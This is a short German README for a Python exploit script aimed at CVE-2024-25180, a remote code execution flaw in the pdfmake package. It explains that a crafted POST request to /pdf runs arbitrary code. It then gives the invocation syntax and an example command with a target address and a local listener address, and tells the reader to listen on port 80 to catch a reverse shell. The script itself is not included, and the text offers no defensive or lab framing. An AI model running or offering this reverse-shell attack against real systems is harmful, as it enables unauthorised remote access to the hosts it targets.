
Python-Exploit-Skript für CVE-2024-25180, eine Schwachstelle zur Remotecodeausführung in pdfmake, die eine Reverse Shell mittels gezielter POST-Anfragen bereitstellt.
pdfmake ist ein reines JavaScript-basiertes PDF-Druckwerkzeug für Client/Server. Die betroffene Version dieses Pakets ist anfällig für beliebige Code-Injection-Angriffe. Ein Angreifer kann beliebigen Code ausführen, indem er eine speziell gestaltete POST-Anfrage an den Pfad /pdf sendet. Der Angreifer kann durch das Senden einer speziell gestalteten Anfrage beliebigen Code auf dem System ausführen.
CVE-2024-25180 Remote Code Execution in pdfmake
python3 CVE-2024-25180.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>
python3 CVE-2024-25180.py 192.168.140.42 1234 192.168.45.208 80
Hören Sie auf Port 80, um eine Reverse-Shell zu erhalten.
